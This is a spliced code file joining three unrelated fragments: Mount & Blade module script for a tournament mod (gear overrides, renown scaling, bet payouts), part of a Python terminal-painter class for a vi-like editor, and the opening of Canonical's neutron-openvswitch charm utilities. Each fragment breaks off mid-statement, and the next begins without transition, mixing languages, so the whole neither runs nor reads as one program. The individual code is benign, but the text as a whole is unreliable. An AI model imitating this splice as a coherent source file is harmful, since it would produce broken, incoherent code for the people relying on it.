(eq, "$g_wp_tpe_active", 0), # TPE 1.2 + If TPE deactivated by player then everyone gets random stuff.
(call_script, "script_tpe_equip_troop", ":troop_id"), # gears up the troop.
(try_end),
(str_clear, s1),
# Do they get a horse?
(assign, ":give_enhanced_armor", 0),
(assign, ":give_enhanced_weapons", 0),
(try_begin),
# Check if mounts are allowed in this center's tournaments and override if needed.
(store_sub, ":city_offset", "$current_town", towns_begin),
(store_mul, ":city_settings", ":city_offset", 10),
(store_add, ":slot_offset", ":city_settings", tdp_val_setting_horse),
(troop_get_slot, ":mount_chance", tpe_settings, ":slot_offset"),
(ge, ":mount_chance", 1), # City allows mounts at all.
(try_begin),
(troop_slot_eq, ":troop_id", slot_troop_tournament_enhanced_horse, 1),
(assign, ":team_horse", ":item_enh_horse"),
(val_add, ":team_horse", ":troop_team"), # TESTING - Commented since I don't have different colored warhorses yet.
(mission_tpl_entry_add_override_item, ":mission_template", ":troop_entry", ":team_horse"),
(str_store_string, s1, "@{s1} enhanced horse (+2),"), # debugging
(else_try),
(troop_slot_eq, ":troop_id", slot_troop_tournament_horse, 1),
(assign, ":team_horse", ":item_normal_horse"),
(val_add, ":team_horse", ":troop_team"), # TESTING - Commented since I don't have different colored warhorses yet.
(mission_tpl_entry_add_override_item, ":mission_template", ":troop_entry", ":team_horse"),
#(mission_tpl_entry_add_override_item, ":mission_template", ":troop_entry", wp_tpe_normal_horse),
(str_store_string, s1, "@{s1} horse (+1),"), # debugging
(try_end),
(else_try),
# Give the troop something else if they had mounts enabled, but can't use them.
(troop_slot_eq, ":troop_id", slot_troop_tournament_horse, 1),
(eq, ":mount_chance", 0),
(try_begin),
(troop_slot_eq, ":troop_id", slot_troop_tournament_enhanced_armor, 0),
(assign, ":give_enhanced_armor", 1),
(else_try),
(troop_slot_eq, ":troop_id", slot_troop_tournament_enhanced_weapons, 0),
(assign, ":give_enhanced_weapons", 1),
(try_end),
(try_end),
# Do they have enhanced armor?
(try_begin),
(this_or_next|troop_slot_eq, ":troop_id", slot_troop_tournament_enhanced_armor, 1),
(eq, ":give_enhanced_armor", 1),
(assign, ":team_armor", wp_tpe_enhanced_armor),
(val_add, ":team_armor", ":troop_team"),
(mission_tpl_entry_add_override_item, ":mission_template", ":troop_entry", ":team_armor"),
(str_store_string, s1, "@{s1} enhanced armor (+1),"), # debugging
(assign, ":team_helmet", wp_tpe_enhanced_helmet),
(val_add, ":team_helmet", ":troop_team"),
(mission_tpl_entry_add_override_item, ":mission_template", ":troop_entry", ":team_helmet"),
(str_store_string, s1, "@{s1} enhanced helmet,"), # debugging
(mission_tpl_entry_add_override_item, ":mission_template", ":troop_entry", wp_tpe_enhanced_boots),
(str_store_string, s1, "@{s1} enhanced boots,"), # debugging
(else_try),
(assign, ":team_armor", wp_tpe_default_armor),
(val_add, ":team_armor", ":troop_team"),
(str_store_string, s1, "@{s1} armor,"), # debugging
(mission_tpl_entry_add_override_item, ":mission_template", ":troop_entry", ":team_armor"),
(assign, ":team_helmet", wp_tpe_normal_helmet), # Section commented out to prevent normal armor having a helm.
(val_add, ":team_helmet", ":troop_team"),
(str_store_string, s1, "@{s1} helmet,"), # debugging
(mission_tpl_entry_add_override_item, ":mission_template", ":troop_entry", ":team_helmet"),
(mission_tpl_entry_add_override_item, ":mission_template", ":troop_entry", wp_tpe_normal_boots),
(str_store_string, s1, "@{s1} boots,"), # debugging
(try_end),
# Do they have an enhanced shield?
(try_begin),
(troop_slot_eq, ":troop_id", slot_troop_tournament_enhanced_shield, 1),
(assign, ":team_armor", wp_tpe_enhanced_shield),
(val_add, ":team_armor", ":troop_team"),
(mission_tpl_entry_add_override_item, ":mission_template", ":troop_entry", ":team_armor"),
(str_store_string, s1, "@{s1} enhanced shield (+1),"), # debugging
(else_try),
(this_or_next|troop_slot_eq, ":troop_id", slot_troop_tournament_lance, 1),
(this_or_next|troop_slot_eq, ":troop_id", slot_troop_tournament_onehand, 1),
(troop_slot_eq, ":troop_id", slot_troop_tournament_throwing, 1),
(assign, ":team_armor", wp_tpe_normal_shield),
(val_add, ":team_armor", ":troop_team"),
(mission_tpl_entry_add_override_item, ":mission_template", ":troop_entry", ":team_armor"),
(str_store_string, s1, "@{s1} shield,"), # debugging
(try_end),
# Lances
(try_begin),
(troop_slot_eq, ":troop_id", slot_troop_tournament_lance, 1),
(this_or_next|troop_slot_eq, ":troop_id", slot_troop_tournament_enhanced_weapons, 1),
(eq, ":give_enhanced_weapons", 1),
(mission_tpl_entry_add_override_item, ":mission_template", ":troop_entry", ":item_enh_lance"),
(str_store_item_name, s2, ":item_enh_lance"),
(str_store_string, s1, "@{s1} enhanced {s2} lance (+2),"), # debugging
(else_try),
(troop_slot_eq, ":troop_id", slot_troop_tournament_lance, 1),
(mission_tpl_entry_add_override_item, ":mission_template", ":troop_entry", ":item_normal_lance"),
(str_store_item_name, s2, ":item_normal_lance"),
(str_store_string, s1, "@{s1} {s2} (+1),"), # debugging
(try_end),
# Bows
(try_begin),
(troop_slot_eq, ":troop_id", slot_troop_tournament_bow, 1),
(this_or_next|troop_slot_eq, ":troop_id", slot_troop_tournament_enhanced_weapons, 1),
(eq, ":give_enhanced_weapons", 1),
(mission_tpl_entry_add_override_item, ":mission_template", ":troop_entry", ":item_enh_archery"),
(mission_tpl_entry_add_override_item, ":mission_template", ":troop_entry", "itm_practice_arrows"),
(str_store_item_name, s2, ":item_enh_archery"),
(str_store_string, s1, "@{s1} enhanced {s2} (+2),"), # debugging
(else_try),
(troop_slot_eq, ":troop_id", slot_troop_tournament_bow, 1),
(mission_tpl_entry_add_override_item, ":mission_template", ":troop_entry", ":item_normal_archery"),
(mission_tpl_entry_add_override_item, ":mission_template", ":troop_entry", "itm_practice_arrows"),
(str_store_item_name, s2, ":item_normal_archery"),
(str_store_string, s1, "@{s1} {s2} (+1),"), # debugging
(try_end),
# Single handed weapons
(try_begin),
(troop_slot_eq, ":troop_id", slot_troop_tournament_onehand, 1),
(this_or_next|troop_slot_eq, ":troop_id", slot_troop_tournament_enhanced_weapons, 1),
(eq, ":give_enhanced_weapons", 1),
(mission_tpl_entry_add_override_item, ":mission_template", ":troop_entry", ":item_enh_onehand"),
(str_store_item_name, s2, ":item_enh_onehand"),
(str_store_string, s1, "@{s1} enhanced {s2} (+2),"), # debugging
(else_try),
(troop_slot_eq, ":troop_id", slot_troop_tournament_onehand, 1),
(mission_tpl_entry_add_override_item, ":mission_template", ":troop_entry", ":item_normal_onehand"),
(str_store_item_name, s2, ":item_normal_onehand"),
(str_store_string, s1, "@{s1} {s2} (+1),"), # debugging
(try_end),
# Two handed weapons
(try_begin),
(troop_slot_eq, ":troop_id", slot_troop_tournament_twohand, 1),
(this_or_next|troop_slot_eq, ":troop_id", slot_troop_tournament_enhanced_weapons, 1),
(eq, ":give_enhanced_weapons", 1),
(mission_tpl_entry_add_override_item, ":mission_template", ":troop_entry", ":item_enh_twohand"),
(str_store_item_name, s2, ":item_enh_twohand"),
(str_store_string, s1, "@{s1} enhanced {s2} (+2),"), # debugging
(else_try),
(troop_slot_eq, ":troop_id", slot_troop_tournament_twohand, 1),
(mission_tpl_entry_add_override_item, ":mission_template", ":troop_entry", ":item_normal_twohand"),
(str_store_item_name, s2, ":item_normal_twohand"),
(str_store_string, s1, "@{s1} {s2} (+1),"), # debugging
(try_end),
# Crossbows
(try_begin),
(troop_slot_eq, ":troop_id", slot_troop_tournament_crossbow, 1),
(this_or_next|troop_slot_eq, ":troop_id", slot_troop_tournament_enhanced_weapons, 1),
(eq, ":give_enhanced_weapons", 1),
(mission_tpl_entry_add_override_item, ":mission_template", ":troop_entry", ":item_enh_crossbow"),
(str_store_item_name, s2, ":item_enh_crossbow"),
(str_store_string, s1, "@{s1} enhanced {s2} (+2),"), # debugging
(mission_tpl_entry_add_override_item, ":mission_template", ":troop_entry", "itm_practice_bolts"),
(else_try),
(troop_slot_eq, ":troop_id", slot_troop_tournament_crossbow, 1),
(mission_tpl_entry_add_override_item, ":mission_template", ":troop_entry", ":item_normal_crossbow"),
(mission_tpl_entry_add_override_item, ":mission_template", ":troop_entry", "itm_practice_bolts"),
(str_store_item_name, s2, ":item_normal_crossbow"),
(str_store_string, s1, "@{s1} {s2} (+1),"), # debugging
(try_end),
# Thrown Weapons
(try_begin),
(troop_slot_eq, ":troop_id", slot_troop_tournament_throwing, 1),
(this_or_next|troop_slot_eq, ":troop_id", slot_troop_tournament_enhanced_weapons, 1),
(eq, ":give_enhanced_weapons", 1),
(mission_tpl_entry_add_override_item, ":mission_template", ":troop_entry", ":item_enh_throwing"),
(str_store_item_name, s2, ":item_enh_throwing"),
(str_store_string, s1, "@{s1} enhanced {s2} (+2),"), # debugging
(else_try),
(troop_slot_eq, ":troop_id", slot_troop_tournament_throwing, 1),
(mission_tpl_entry_add_override_item, ":mission_template", ":troop_entry", ":item_normal_throwing"),
(str_store_item_name, s2, ":item_normal_throwing"),
(str_store_string, s1, "@{s1} {s2} (+1),"), # debugging
(try_end),
# Polearms
(try_begin),
(troop_slot_eq, ":troop_id", slot_troop_tournament_polearm, 1),
(this_or_next|troop_slot_eq, ":troop_id", slot_troop_tournament_enhanced_weapons, 1),
(eq, ":give_enhanced_weapons", 1),
(mission_tpl_entry_add_override_item, ":mission_template", ":troop_entry", ":item_enh_polearm"),
(str_store_item_name, s2, ":item_enh_polearm"),
(str_store_string, s1, "@{s1} enhanced {s2} (+2),"), # debugging
(else_try),
(troop_slot_eq, ":troop_id", slot_troop_tournament_polearm, 1),
(mission_tpl_entry_add_override_item, ":mission_template", ":troop_entry", ":item_normal_polearm"),
(str_store_item_name, s2, ":item_normal_polearm"),
(str_store_string, s1, "@{s1} {s2} (+1),"), # debugging
(try_end),
(try_begin),
(ge, DEBUG_TPE_DESIGN, 1), # Very verbose display.
(str_store_troop_name, s2, ":troop_id"),
(display_message, "@DEBUG (TPE): {s2} receives {s1}."),
(try_end),
]),
## TOURNAMENT PLAY ENHANCEMENTS end
# script_tpe_determine_scaled_renown
# This section implements the "Renown Scaling" feature.
# Inputs: troop_id
# Output: reg0 (new renown)
("tpe_determine_scaled_renown",
[
(store_script_param, ":troop_no", 1),
# Determine renown gained by player level.
(store_character_level, ":player_level", ":troop_no"),
(store_div, ":sr_level_factor", 40, ":player_level"), # Balanced for a max level of 40. Beyond this you get minimum gain.
(val_mul, ":sr_level_factor", 5),
(store_div, ":sr_factor_limit", wp_tpe_max_renown, 2), # Since two factors are used. Total is split by 2.
(val_min, ":sr_level_factor", ":sr_factor_limit"), # Prevents an extremely low level gaining more renown than intended.
(val_max, ":sr_level_factor", 5), # Sets a minimum renown gain of 5 no matter how high your level is.
# Determine renown gained by player renown.
(troop_get_slot, ":player_renown", ":troop_no", slot_troop_renown),
(store_div, ":sr_renown_factor", 1500, ":player_renown"), # Balanced for a max renown of 1500. Beyond this you get minimum gain.
(val_mul, ":sr_renown_factor", 5),
(store_div, ":sr_factor_limit", wp_tpe_max_renown, 2), # Since two factors are used. Total is split by 2.
(val_min, ":sr_renown_factor", ":sr_factor_limit"), # Prevents an extremely low level gaining more renown than intended.
(val_max, ":sr_renown_factor", 5), # Sets a minimum renown gain of 5 no matter how high your level is.
(store_add, reg0, ":sr_level_factor", ":sr_renown_factor"), # combines both factors.
]),
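# Worked example (illustrative values): a level 20 player with 500 renown and an assumed
# wp_tpe_max_renown of 50 gets level factor min(50/2, (40/20)*5) = 10 and renown factor
# min(50/2, (1500/500)*5) = 15, so reg0 = 25. All divisions are integer divisions.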
###########################################################################################################################
##### TPE 1.3 Additions #####
###########################################################################################################################
###########################################################################################################################
##### REWARDS & BETTING #####
###########################################################################################################################
# script_tpe_set_bet
# Figures out what your persistent bet is and places it accordingly each round.
# Input: none
# Output: none
("tpe_set_bet",
[
(try_begin),
(eq, "$g_wp_tpe_active", 1),
(call_script, "script_tpe_calculate_wager_for_bid"),
(assign, ":bid", reg2),
(troop_get_slot, ":wager", TPE_OPTIONS, tpe_val_bet_wager),
# If the player doesn't want to wager anything or isn't making a bid no bet should be placed.
(ge, ":bid", 1),
(ge, ":wager", 1),
(store_troop_gold,":current_gold","trp_player"),
(try_begin),
(ge, ":current_gold", ":wager"),
(call_script, "script_tournament_place_bet", ":wager"),
(store_troop_gold,":current_gold","trp_player"),
(assign, reg1, ":current_gold"),
(assign, reg0, ":wager"),
(assign, reg2, ":bid"),
#(display_message, "@You place a bet of {reg0} denars before starting the round. You have {reg1} denars remaining."),
(display_message, "str_tpe_message_round_bid", gpu_green),
(display_message, "str_tpe_message_round_cash_left"),
(else_try),
(assign, reg0, ":wager"),
(display_message, "str_tpe_message_cant_cover_bet", gpu_red),
(try_end),
(try_end),
]),
# script_tpe_calculate_wager_for_bid
# Reads the player's bid (target number of kills) and wager, then computes the payout for that bid.
# Input: none (bid and wager are read from TPE_OPTIONS slots)
# Output: reg2 (clamped bid), reg3 (wager), reg4 (payout)
("tpe_calculate_wager_for_bid",
[
(troop_get_slot, ":bid", TPE_OPTIONS, tpe_val_bet_bid),
(troop_get_slot, ":wager", TPE_OPTIONS, tpe_val_bet_wager),
# Determine how many kills are even possible given the current team setup.
(assign, ":team_size", "$g_tournament_next_team_size"),
(assign, ":team_number", "$g_tournament_next_num_teams"),
(val_sub, ":team_number", 1),
(store_mul, ":valid_enemies", ":team_size", ":team_number"),
(try_begin),
(lt, ":valid_enemies", ":bid"),
(assign, ":bid", ":valid_enemies"),
(try_end),
#(assign, ":bid_amount", reg3),
#### CONFIGURE PAYOUT ####
(store_mul, ":bid_times_100", ":bid", 100),
(store_div, ":percent_of_enemies", ":bid_times_100", ":valid_enemies"),
(store_mul, ":bid_payout_factor", ":percent_of_enemies", 15),
(val_add, ":bid_payout_factor", 100),
(store_mul, ":payout", ":wager", ":bid_payout_factor"),
(val_div, ":payout", 100),
(try_begin),
(str_clear, s21),
(store_mul, ":max_limit", ":valid_enemies", 300),
(val_min, ":payout", ":max_limit"),
(ge, ":payout", ":max_limit"),
(str_store_string, s21, "@ (limited)"),
(else_try),
(ge, ":payout", wp_tpe_maximum_payout_per_round),
(val_min, ":payout", wp_tpe_maximum_payout_per_round),
(str_store_string, s21, "@ (limited)"),
(try_end),
(assign, reg4, ":payout"),
(str_store_string, s22, "str_tpe_label_bid_payout_r4"),
(str_store_string, s23, "@{s22}{s21}"),
(assign, reg2, ":bid"),
(assign, reg3, ":wager"),
(assign, reg4, ":payout"),
(try_begin),
### TOURNAMENT OPTIONS PANEL ###
(is_presentation_active, "prsnt_tournament_options_panel"),
# Set the BID slider
else:
char_rows = len(set(_.row for _ in char_pins))
if char_rows == 1:
rep = "{} chars in 1 line".format(len(char_pins))
else:
rep = "{} chars across {} lines".format(len(char_pins), char_rows)
return rep
#
# Stack the I/O of a Terminal
# as TerminalPainter > TerminalShadow > TerminalDriver
#
class TerminalPainter:
"""Paint a Screen of Rows of Chars"""
# pylint: disable=too-many-instance-attributes
def __init__(self, terminal):
self.terminal = terminal # layer over a TerminalShadow
self.rows = None # count Rows on Screen
self.columns = None # count Columns per Row
self.scrolling_rows = None # count Scrolling Rows at top of Screen
self.status_row = None # index the 1 Status Row at bottom of Screen
self.top_line_number = 1 # number the Scrolling Rows down from First of Screen
self.model_line_number = 1 # right-justify the Line Numbers
self.painting_line_number = None # number the Scrolling Rows visibly, or not
# TODO: all = None in TerminalPainter.__init__
def __enter__(self):
"""Connect Keyboard and switch Screen to XTerm Alt Screen"""
if self.rows is None:
self.terminal.__enter__()
self.reopen_terminal()
def __exit__(self, exc_type, exc_value, exc_traceback):
"""Switch Screen to Xterm Main Screen and disconnect Keyboard"""
rows = self.rows
terminal = self.terminal
if rows is not None:
self.rows = None
self.columns = None # TODO: think into how much TerminalPainter to wipe
terminal.__exit__(exc_type, exc_value, exc_traceback) # pos args
def reopen_terminal(self):
"""Clear the Caches of this Terminal, here and below"""
terminal = self.terminal
size = terminal.reopen_terminal() # a la os.get_terminal_size(fd)
(columns, rows) = (size.columns, size.lines)
assert rows
assert columns
self.rows = rows
self.columns = columns
self.scrolling_rows = rows - 1 # reserve last 1 line for Status
self.status_row = self.scrolling_rows
return size
def pdb_set_trace(self):
"""Visit Pdb, if Stdin is Tty, else raise 'bdb.BdbQuit'"""
exc_info = (None, None, None) # commonly equal to 'sys.exc_info()' here
self.__exit__(*exc_info)
pdb.set_trace() # pylint: disable=forgotten-debug-statement
self.__enter__()
def flush_painter(self):
"""Stop waiting for more Writes from above"""
self.terminal.flush()
def take_painter_chord(self):
"""Block till TerminalDriver 'kbhit', to return next Keyboard Input"""
chord = self.terminal.getch()
return chord
def terminal_print(self, *args, end="\r\n"):
"""Bypass the cache here: Write line, slip to next, and scroll up if need be"""
line = " ".join(str(_) for _ in args)
self.terminal_write(line + end)
def terminal_write(self, chars):
"""Bypass the cache here: Write the Chars immediately, precisely as given"""
self.terminal.write(chars)
def terminal_write_scrolled_status(self, pin, status):
"""Repaint a copy of the Status Line, as if scrolled to top of Screen"""
erased_line = self.columns * " "
self.terminal_write(CUP_1_1)
self.terminal_write(erased_line)
self.terminal_write(CUP_1_1)
self.terminal_write(status[: (self.columns - 1)])
y = 1 + pin.row
x = 1 + pin.column
self.terminal_write(CUP_Y_X.format(y, x))
def paint_screen(self, ended_lines, spans, status, cursor_style, cursor, bell):
"""Write over the Rows of Chars on Screen"""
# pylint: disable=too-many-arguments
# pylint: disable=too-many-locals
(row, column) = self.spot_nearby_cursor(cursor.row, column=cursor.column)
columns = self.columns
terminal = self.terminal
# Fill the Screen with Lines of "~" past the last Line of File
viewing = cursor_style == _VIEW_CURSOR_STYLE_
lines = self._format_screen_lines(ended_lines, viewing)
# Write the formatted chars
terminal.write(ED_2)
terminal.write(CUP_1_1)
for (index, line) in enumerate(lines):
(styled, line_plus) = self.style_line(
index, line=line, cursor=cursor, spans=spans
)
if len(line_plus) < columns:
terminal.write(styled + "\r\n")
else:
terminal.write(styled) # depend on automagic "\r\n" after Last Column
# Show status, inside the last Row
# but don't write over the Lower Right Char # TODO: test vs xterm autoscroll
str_status = "" if (status is None) else str(status)
status_columns = columns - 1
status_line = str_status[:status_columns].ljust(status_columns)
for chord in sorted(C0_CONTROL_STDINS):
if chord.decode() in status_line:
status_line = repr(status_line)[:status_columns].ljust(status_columns)
assert False, status_line # unreached
break
terminal.write(status_line)
# Style the cursor
if cursor_style is not None:
terminal.write(cursor_style)
# Place the cursor
y = 1 + row
x = 1 + column
terminal.write(CUP_Y_X.format(y, x))
# Ring the bell
if bell:
terminal.write("\a")
# Vi Py ends with . ~ ~ ~ ... when the File ends without a Line-End
# Vim quirkily shows the last Lines the same, no matter ended by Line-End
# TODO: invent ways for Vi Py and Em Py to edit the Line-End's
def _format_screen_lines(self, ended_lines, viewing):
"""Choose a Screen of Lines to show many Columns of these Ended Lines"""
columns = self.columns
scrolling_rows = self.scrolling_rows
# Drop the Line End's
bare_lines = list(str_remove_line_end(_) for _ in ended_lines)
# Pick out the Vi Py case of inserting or replacing into an Empty File
# and lead with an empty Filler Line in that case
if not bare_lines:
if not viewing:
if not wearing_em():
bare_lines.append("")
# Number the Scrolling Lines of the Screen
lines = list()
for (index, bare_line) in enumerate(bare_lines):
str_line_number = self.format_as_line_number(index)
line = (str_line_number + bare_line)[:columns]
lines.append(line)
# Pick out the Vi Py case of a File whose Last Line has no Line End,
# and lead with a Filler Line of a single "." Dot in that case
if len(lines) < scrolling_rows:
if lines_last_has_no_end(ended_lines):
if not wearing_em():
lines.append(".")
# Complete the screen, with "~" for Vi Py or with "" for Em Py
while len(lines) < scrolling_rows:
if wearing_em():
lines.append("")
else:
lines.append("~")
# Vi Py shows an empty File as occupying no space
# Vim Quirk presents empty File same as a File of 1 Blank Line
# Assert Screen completed
assert len(lines) == scrolling_rows, (len(lines), scrolling_rows)
return lines
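# e.g. (sketch, Vi Py with line numbering off): a 2-line file whose last line lacks a
# line-end, shown in a 5-row scrolling area, comes out as: line 1, line 2, ".", "~", "~"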
def spot_nearby_cursor(self, row, column):
"""Choose a Row:Column to stand for a Row:Column on or off Screen"""
columns = self.columns
scrolling_rows = self.scrolling_rows
rows = self.rows
assert rows
assert columns
found_row = min(rows - 1, row)
left_column = self.spot_left_column() if (row < scrolling_rows) else 0
found_column = min(columns - 1, left_column + column)
return (found_row, found_column)
def spot_left_column(self):
"""Find the leftmost Column occupied by the Chars of the Scrolling Lines"""
formatted = self.format_as_line_number(row=0)
left_column = len(formatted)
return left_column
def format_as_line_number(self, row):
"""Format a Row Index on Screen as a Line Number of File"""
if not self.painting_line_number:
return ""
str_model_line_number = "{:3} ".format(self.model_line_number)
if wearing_em():
str_model_line_number = " {} ".format(self.model_line_number)
last_width = len(str_model_line_number)
line_number = self.top_line_number + row
formatted = "{:3} ".format(line_number).rjust(last_width)
if wearing_em():
formatted = " {} ".format(line_number).rjust(last_width)
return formatted
def style_line(self, row, line, cursor, spans):
"""Inject kinds of SGR so as to style the Chars of a Row"""
# pylint: disable=too-many-locals
# Work only inside this Row
(spans0, line_plus) = self.spread_spans(row, line=line, spans=spans)
# Add a one Char Span at the Cursor
# to show SGR_N in place of DECSCUSR_N for styling the Cursor
spans1 = list(spans0)
if False: # pylint: disable=using-constant-test
if row == cursor.row:
cursor_span = TerminalSpan(
row=cursor.row, column=cursor.column, beyond=(cursor.column + 1)
)
spans1.append(cursor_span)
spans1.sort()
# Add one Empty Span beyond the end
beyond = len(line_plus)
empty_beyond_span = TerminalSpan(row, column=beyond, beyond=beyond)
spans2 = list(spans1)
spans2.append(empty_beyond_span)
# Visit the Chars between each pair of Spans, and the Chars of the Spans
visited = 0
opened = False
styled = ""
for span in spans2:
# Write the Chars before this Span, as Highlight never opened or as closed
if visited < span.column:
fragment = line_plus[visited : span.column]
styled += _LIT_CLOSE_ if opened else ""
styled += fragment
opened = False
visited = span.column
# Write the Chars of this Span, as Highlight opened
if span.column < span.beyond:
fragment = line_plus[span.column : span.beyond]
styled += "" if opened else _LIT_OPEN_
styled += fragment
opened = True
visited = span.beyond
# Close the last opened Highlight, if it exists
styled += _LIT_CLOSE_ if opened else ""
return (styled, line_plus)
def spread_spans(self, row, line, spans):
"""Spread each Empty Span to cover one more Column beyond it"""
# pylint: disable=too-many-locals
columns = self.columns
left_column = self.spot_left_column()
assert len(line) <= columns, (len(line), columns)
# Look only at the Columns on Screen of This Row
row_spans = list()
for span in spans:
if span.row == row:
column = left_column + span.column
if column < columns:
beyond = min(columns, left_column + span.beyond)
row_span = TerminalSpan(row, column=column, beyond=beyond)
row_spans.append(row_span)
# Visit each Empty Span
for (index, span) in enumerate(row_spans):
column = left_column + span.column
beyond = left_column + span.beyond
assert span.column <= span.beyond <= columns, (span, columns)
if
# CanonicalBootStack/charm-neutron-openvswitch
# Copyright 2016 Canonical Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import hashlib
import json
import os
from itertools import chain
import shutil
import subprocess
from charmhelpers.contrib.openstack.neutron import neutron_plugin_attribute
from copy import deepcopy
from charmhelpers.contrib.openstack import context, templating
from charmhelpers.contrib.openstack.utils import (
pause_unit,
resume_unit,
make_assess_status_func,
is_unit_paused_set,
os_application_version_set,
remote_restart,
CompareOpenStackReleases,
os_release,
)
from collections import OrderedDict
import neutron_ovs_context
from charmhelpers.contrib.network.ovs import (
add_bridge,
add_bridge_port,
is_linuxbridge_interface,
add_ovsbridge_linuxbridge,
full_restart,
enable_ipfix,
disable_ipfix,
)
from charmhelpers.core.hookenv import (
config,
status_set,
log,
)
from charmhelpers.contrib.openstack.neutron import (
parse_bridge_mappings,
determine_dkms_package,
headers_package,
)
from charmhelpers.contrib.openstack.context import (
ExternalPortContext,
DataPortContext,
WorkerConfigContext,
parse_data_port_mappings,
)
from charmhelpers.core.host import (
lsb_release,
service,
service_restart,
service_running,
CompareHostReleases,
init_is_systemd,
group_exists,
user_exists,
)
from charmhelpers.fetch import (
apt_install,
apt_purge,
apt_update,
filter_installed_packages,
filter_missing_packages,
apt_autoremove,
get_upstream_version
)
from pci import PCINetDevices
# The interface is said to be satisfied if any one of the interfaces in the
# list has a complete context.
# LY: Note the neutron-plugin is always present since that is the relation
# with the principal and no data currently flows down from the principal,
# so there is no point in having it in REQUIRED_INTERFACES
REQUIRED_INTERFACES = {
'messaging': ['amqp', 'zeromq-configuration'],
}
VERSION_PACKAGE = 'neutron-common'
NOVA_CONF_DIR = "/etc/nova"
NEUTRON_DHCP_AGENT_CONF = "/etc/neutron/dhcp_agent.ini"
NEUTRON_DNSMASQ_CONF = "/etc/neutron/dnsmasq.conf"
NEUTRON_CONF_DIR = "/etc/neutron"
NEUTRON_CONF = '%s/neutron.conf' % NEUTRON_CONF_DIR
NEUTRON_DEFAULT = '/etc/default/neutron-server'
NEUTRON_L3_AGENT_CONF = "/etc/neutron/l3_agent.ini"
NEUTRON_FWAAS_CONF = "/etc/neutron/fwaas_driver.ini"
ML2_CONF = '%s/plugins/ml2/ml2_conf.ini' % NEUTRON_CONF_DIR
OVS_CONF = '%s/plugins/ml2/openvswitch_agent.ini' % NEUTRON_CONF_DIR
EXT_PORT_CONF = '/etc/init/ext-port.conf'
NEUTRON_METADATA_AGENT_CONF = "/etc/neutron/metadata_agent.ini"
DVR_PACKAGES = ['neutron-l3-agent']
DHCP_PACKAGES = ['neutron-dhcp-agent']
METADATA_PACKAGES = ['neutron-metadata-agent']
PY3_PACKAGES = [
'python3-neutron',
]
PURGE_PACKAGES = [
'python-neutron',
'python-neutron-fwaas',
]
PHY_NIC_MTU_CONF = '/etc/init/os-charm-phy-nic-mtu.conf'
TEMPLATES = 'templates/'
OVS_DEFAULT = '/etc/default/openvswitch-switch'
DPDK_INTERFACES = '/etc/dpdk/interfaces'
NEUTRON_SRIOV_AGENT_CONF = os.path.join(NEUTRON_CONF_DIR,
'plugins/ml2/sriov_agent.ini')
NEUTRON_SRIOV_INIT_SCRIPT = os.path.join('/etc/init.d',
'neutron-openvswitch-'
'networking-sriov.sh')
NEUTRON_SRIOV_INIT_DEFAULT = os.path.join('/etc/default',
'neutron-openvswitch-'
'networking-sriov')
NEUTRON_SRIOV_SYSTEMD_UNIT = os.path.join('/lib/systemd/system',
'neutron-openvswitch-'
'networking-sriov.service')
NEUTRON_SRIOV_UPSTART_CONF = os.path.join('/etc/init',
'neutron-openvswitch-'
'networking-sriov.conf')
BASE_RESOURCE_MAP = OrderedDict([
(NEUTRON_CONF, {
'services': ['neutron-plugin-openvswitch-agent'],
'contexts': [neutron_ovs_context.OVSPluginContext(),
neutron_ovs_context.RemoteRestartContext(
['neutron-plugin', 'neutron-control']),
context.AMQPContext(ssl_dir=NEUTRON_CONF_DIR),
context.ZeroMQContext(),
context.NotificationDriverContext()],
}),
(ML2_CONF, {
'services': ['neutron-plugin-openvswitch-agent'],
'contexts': [neutron_ovs_context.OVSPluginContext()],
}),
(OVS_CONF, {
'services': ['neutron-openvswitch-agent'],
'contexts': [neutron_ovs_context.OVSPluginContext()],
}),
(OVS_DEFAULT, {
'services': ['openvswitch-switch'],
'contexts': [neutron_ovs_context.OVSDPDKDeviceContext(),
neutron_ovs_context.RemoteRestartContext(
['neutron-plugin', 'neutron-control'])],
}),
(DPDK_INTERFACES, {
'services': ['dpdk', 'openvswitch-switch'],
'contexts': [neutron_ovs_context.DPDKDeviceContext()],
}),
(PHY_NIC_MTU_CONF, {
'services': ['os-charm-phy-nic-mtu'],
'contexts': [context.PhyNICMTUContext()],
}),
])
METADATA_RESOURCE_MAP = OrderedDict([
(NEUTRON_METADATA_AGENT_CONF, {
'services': ['neutron-metadata-agent'],
'contexts': [neutron_ovs_context.SharedSecretContext(),
neutron_ovs_context.APIIdentityServiceContext(),
WorkerConfigContext()],
}),
])
DHCP_RESOURCE_MAP = OrderedDict([
(NEUTRON_DHCP_AGENT_CONF, {
'services': ['neutron-dhcp-agent'],
'contexts': [neutron_ovs_context.DHCPAgentContext()],
}),
(NEUTRON_DNSMASQ_CONF, {
'services': ['neutron-dhcp-agent'],
'contexts': [neutron_ovs_context.DHCPAgentContext()],
}),
])
DVR_RESOURCE_MAP = OrderedDict([
(NEUTRON_L3_AGENT_CONF, {
'services': ['neutron-l3-agent'],
'contexts': [neutron_ovs_context.L3AgentContext()],
}),
(NEUTRON_FWAAS_CONF, {
'services': ['neutron-l3-agent'],
'contexts': [neutron_ovs_context.L3AgentContext()],
}),
(EXT_PORT_CONF, {
'services': ['neutron-l3-agent'],
'contexts': [context.ExternalPortContext()],
}),
])
SRIOV_RESOURCE_MAP = OrderedDict([
(NEUTRON_SRIOV_AGENT_CONF, {
'services': ['neutron-sriov-agent'],
'contexts': [neutron_ovs_context.OVSPluginContext()],
}),
(NEUTRON_SRIOV_INIT_DEFAULT, {
'services': [],
'contexts': [neutron_ovs_context.OVSPluginContext()],
}),
(NEUTRON_SRIOV_INIT_SCRIPT, {
'services': [],
'contexts': [],
}),
(NEUTRON_SRIOV_SYSTEMD_UNIT, {
'services': [],
'contexts': [],
}),
(NEUTRON_SRIOV_UPSTART_CONF, {
'services': [],
'contexts': [],
}),
])
TEMPLATES = 'templates/'
INT_BRIDGE = "br-int"
EXT_BRIDGE = "br-ex"
DATA_BRIDGE = 'br-data'
def install_packages():
apt_update()
# NOTE(jamespage): install neutron-common package so we always
# get a clear signal on which OS release is
# being deployed
apt_install(filter_installed_packages(['neutron-common']),
fatal=True)
# NOTE(jamespage): ensure early install of dkms related
# dependencies for kernels which need
